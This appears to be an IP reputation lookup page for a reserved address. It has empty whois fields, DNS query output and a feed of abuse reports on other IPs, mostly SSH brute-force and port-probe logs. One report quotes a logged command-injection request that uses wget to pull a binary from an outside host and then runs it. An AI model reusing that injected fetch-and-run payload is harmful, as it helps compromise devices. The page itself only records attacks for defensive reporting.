Must be a valid IPv4 or IPv6 ip address, e.g. 127.0.0.1 or 2001:DB8:0:0:8:800:200C:417A
Basic Info

City: unknown

Region: unknown

Country: IANA Special-Purpose Address

Internet Service Provider: unknown

Hostname: unknown

Organization: unknown

Usage Type: unknown

Comments:
No discussion about this IP yet. Click above link to make one.
Comments on same subnet:
No discussion about this subnet yet..
Whois info:
b
Dig info:
; <<>> DiG 9.10.3-P4-Ubuntu <<>> 0.214.43.63
;; global options: +cmd
;; Got answer:
;; ->>HEADER<<- opcode: QUERY, status: NXDOMAIN, id: 39555
;; flags: qr rd ra; QUERY: 1, ANSWER: 0, AUTHORITY: 1, ADDITIONAL: 0

;; QUESTION SECTION:
;0.214.43.63.			IN	A

;; AUTHORITY SECTION:
.			509	IN	SOA	a.root-servers.net. nstld.verisign-grs.com. 2023100401 1800 900 604800 86400

;; Query time: 74 msec
;; SERVER: 183.60.83.19#53(183.60.83.19)
;; WHEN: Thu Oct 05 05:38:05 CST 2023
;; MSG SIZE  rcvd: 104
Host info
Host 63.43.214.0.in-addr.arpa. not found: 3(NXDOMAIN)
Nslookup info:
Server:		183.60.83.19
Address:	183.60.83.19#53

** server can't find 63.43.214.0.in-addr.arpa: NXDOMAIN
Related IP info:
Related comments:
IP Type Details Datetime
89.248.168.176 attack
01/13/2020-12:13:08.817230 89.248.168.176 Protocol: 6 ET DROP Dshield Block Listed Source group 1
2020-01-14 01:49:36
190.87.196.100 attackbots
Jan 13 11:02:35 h2570396 sshd[25967]: pam_unix(sshd:auth): authentication failure; logname= uid=0 euid=0 tty=ssh ruser= rhost=190.87.196.100  user=user
Jan 13 11:02:38 h2570396 sshd[25967]: Failed password for user from 190.87.196.100 port 7565 ssh2
Jan 13 11:02:39 h2570396 sshd[25967]: Connection closed by 190.87.196.100 [preauth]
Jan 13 11:04:00 h2570396 sshd[25969]: pam_unix(sshd:auth): authentication failure; logname= uid=0 euid=0 tty=ssh ruser= rhost=190.87.196.100  user=user
Jan 13 11:04:01 h2570396 sshd[25969]: Failed password for user from 190.87.196.100 port 8046 ssh2
Jan 13 11:04:02 h2570396 sshd[25969]: Connection closed by 190.87.196.100 [preauth]
Jan 13 11:04:42 h2570396 sshd[25993]: pam_unix(sshd:auth): authentication failure; logname= uid=0 euid=0 tty=ssh ruser= rhost=190.87.196.100  user=user
Jan 13 11:04:44 h2570396 sshd[25993]: Failed password for user from 190.87.196.100 port 11680 ssh2
Jan 13 11:04:45 h2570396 sshd[25993]: Connection closed by 190.87........
-------------------------------
2020-01-14 01:28:46
45.115.173.155 attackspambots
Honeypot attack, port: 445, PTR: PTR record not found
2020-01-14 01:43:16
182.61.176.105 attack
Unauthorized connection attempt detected from IP address 182.61.176.105 to port 2220 [J]
2020-01-14 01:20:10
14.63.194.162 attackbotsspam
Jan 13 14:45:24 master sshd[20881]: Failed password for root from 14.63.194.162 port 17500 ssh2
Jan 13 14:53:27 master sshd[20885]: Failed password for invalid user elliot from 14.63.194.162 port 11907 ssh2
Jan 13 14:56:52 master sshd[20893]: Failed password for invalid user est from 14.63.194.162 port 44135 ssh2
Jan 13 15:00:20 master sshd[21222]: Failed password for invalid user 3333 from 14.63.194.162 port 19740 ssh2
Jan 13 15:03:50 master sshd[21226]: Failed password for invalid user zq from 14.63.194.162 port 51706 ssh2
2020-01-14 01:53:55
82.185.129.97 attackbots
OS command injection: GET /card_scan_decoder.php?No=30&door=`wget http://switchnets.net/hoho.arm7; chmod 777 hoho.arm7; ./hoho.arm7 linear` HTTP/1.1
2020-01-14 01:59:00
37.59.14.72 attackspam
37.59.14.72 - - [13/Jan/2020:13:05:25 +0000] "POST /wp-login.php HTTP/1.1" 200 6409 "-" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0"
37.59.14.72 - - [13/Jan/2020:13:05:26 +0000] "POST /xmlrpc.php HTTP/1.1" 200 403 "-" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0"
...
2020-01-14 01:50:54
91.195.137.183 attackspambots
Automatic report - SSH Brute-Force Attack
2020-01-14 01:41:38
222.174.78.130 attackbotsspam
Honeypot attack, port: 445, PTR: PTR record not found
2020-01-14 01:55:30
117.203.243.194 attackspambots
Bruteforce on SSH Honeypot
2020-01-14 01:25:53
51.158.162.242 attack
Unauthorized connection attempt detected from IP address 51.158.162.242 to port 2220 [J]
2020-01-14 01:50:22
190.181.60.50 attackbots
Unauthorized connection attempt from IP address 190.181.60.50 on Port 445(SMB)
2020-01-14 01:24:57
36.82.99.88 attackbotsspam
Honeypot attack, port: 445, PTR: PTR record not found
2020-01-14 01:45:58
132.232.4.33 attack
Unauthorized connection attempt detected from IP address 132.232.4.33 to port 2220 [J]
2020-01-14 01:35:13
200.174.240.18 attack
1578920755 - 01/13/2020 14:05:55 Host: 200.174.240.18/200.174.240.18 Port: 445 TCP Blocked
2020-01-14 01:21:51

Recently Reported IPs

71.17.166.117 245.133.145.95 75.220.8.197 105.106.53.225
253.61.202.5 64.18.224.200 157.54.202.21 247.22.165.77
6.208.39.108 52.2.199.73 149.42.74.171 240.126.33.14
0.219.104.70 48.103.78.186 0.195.55.23 138.28.141.16
178.39.119.38 98.199.235.143 96.40.106.85 154.46.11.237